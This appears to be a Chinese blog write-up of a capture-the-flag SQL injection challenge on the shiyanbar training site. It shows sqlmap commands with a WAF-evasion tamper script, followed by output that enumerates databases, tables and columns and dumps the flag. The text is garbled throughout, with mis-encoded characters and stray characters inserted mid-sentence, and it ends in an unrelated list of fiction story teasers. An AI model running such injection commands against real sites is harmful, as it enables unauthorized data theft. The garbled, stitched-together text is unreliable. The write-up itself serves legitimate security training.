Sqlmap初學(xué) 實(shí)驗(yàn)吧 簡單的SQL 注入三

不好意思,經(jīng)過了前面兩題

沖上來就是干

sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --tamper space2comment --dbs

it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y

available databases [3]:

[*] information_schema

[*] test

[*] web1

你沒看錯(cuò)雀彼,就這么跑出來了

sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --tamper space2comment -D web1 --tables

Database: web1

[2 tables]

+-------+

| flag? |

| web_1 |

+-------+

接下來的動(dòng)作都差不多了

sqlmap.py -u http://ctf5.shiyanbar.com/web/index_3.php?id=1 --tamper space2comment -D web1 -T flag --columns

Database: web1

Table: flag

[2 columns]

+--------+----------+

| Column | Type? ? |

+--------+----------+

| flag? | char(30) |

| id? ? | int(4)? |

+--------+----------+

是不是感覺不用動(dòng)腦子就好了。。瞎嬉。

這就是結(jié)果

Database: web1

Table: flag

[1 entry]

+----------------------------+

| flag? ? ? ? ? ? ? ? ? ? ? |

+----------------------------+

| flag{Y0u_@r3_5O_dAmn_90Od} |

+----------------------------+

實(shí)驗(yàn)吧的三道題用同一個(gè)表有點(diǎn)懶啊

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 人面猴
    序言:七十年代末谍椅,一起剝皮案震驚了整個(gè)濱河市,隨后出現(xiàn)的幾起案子界赔,更是在濱河造成了極大的恐慌丢习,老刑警劉巖牵触,帶你破解...
    沈念sama閱讀 211,948評論 6 492
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異咐低,居然都是意外死亡揽思,警方通過查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 90,371評論 3 385
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進(jìn)店門见擦,熙熙樓的掌柜王于貴愁眉苦臉地迎上來钉汗,“玉大人,你說我怎么就攤上這事鲤屡∷鹛担” “怎么了?”我有些...
    開封第一講書人閱讀 157,490評論 0 348
  • 道士緝兇錄:失蹤的賣姜人
    文/不壞的土叔 我叫張陵酒来,是天一觀的道長卢未。 經(jīng)常有香客問我,道長堰汉,這世上最難降的妖魔是什么辽社? 我笑而不...
    開封第一講書人閱讀 56,521評論 1 284
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任,我火速辦了婚禮翘鸭,結(jié)果婚禮上滴铅,老公的妹妹穿的比我還像新娘。我一直安慰自己就乓,他們只是感情好汉匙,可當(dāng)我...
    茶點(diǎn)故事閱讀 65,627評論 6 386
  • 惡毒庶女頂嫁案:這布局不是一般人想出來的
    文/花漫 我一把揭開白布。 她就那樣靜靜地躺著生蚁,像睡著了一般噩翠。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上守伸,一...
    開封第一講書人閱讀 49,842評論 1 290
  • 城市分裂傳說
    那天绎秒,我揣著相機(jī)與錄音,去河邊找鬼尼摹。 笑死见芹,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的蠢涝。 我是一名探鬼主播玄呛,決...
    沈念sama閱讀 38,997評論 3 408
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼和二!你這毒婦竟也來了徘铝?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 37,741評論 0 268
  • 萬榮殺人案實(shí)錄
    序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎惕它,沒想到半個(gè)月后怕午,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 44,203評論 1 303
  • ?護(hù)林員之死
    正文 獨(dú)居荒郊野嶺守林人離奇死亡淹魄,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 36,534評論 2 327
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年郁惜,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片甲锡。...
    茶點(diǎn)故事閱讀 38,673評論 1 341
  • 活死人
    序言:一個(gè)原本活蹦亂跳的男人離奇死亡兆蕉,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出缤沦,到底是詐尸還是另有隱情虎韵,我是刑警寧澤,帶...
    沈念sama閱讀 34,339評論 4 330
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布缸废,位于F島的核電站包蓝,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏呆奕。R本人自食惡果不足惜养晋,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 39,955評論 3 313
  • 男人毒藥:我在死后第九天來索命
    文/蒙蒙 一衬吆、第九天 我趴在偏房一處隱蔽的房頂上張望梁钾。 院中可真熱鬧,春花似錦逊抡、人聲如沸姆泻。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,770評論 0 21
  • 一樁弒父案冒嫡,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽拇勃。三九已至,卻和暖如春孝凌,著一層夾襖步出監(jiān)牢的瞬間方咆,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 32,000評論 1 266
  • 情欲美人皮
    我被黑心中介騙來泰國打工蟀架, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留瓣赂,地道東北人。 一個(gè)月前我還...
    沈念sama閱讀 46,394評論 2 360
  • 代替公主和親
    正文 我出身青樓片拍,卻偏偏與公主長得像煌集,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個(gè)殘疾皇子捌省,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 43,562評論 2 349

推薦閱讀更多精彩內(nèi)容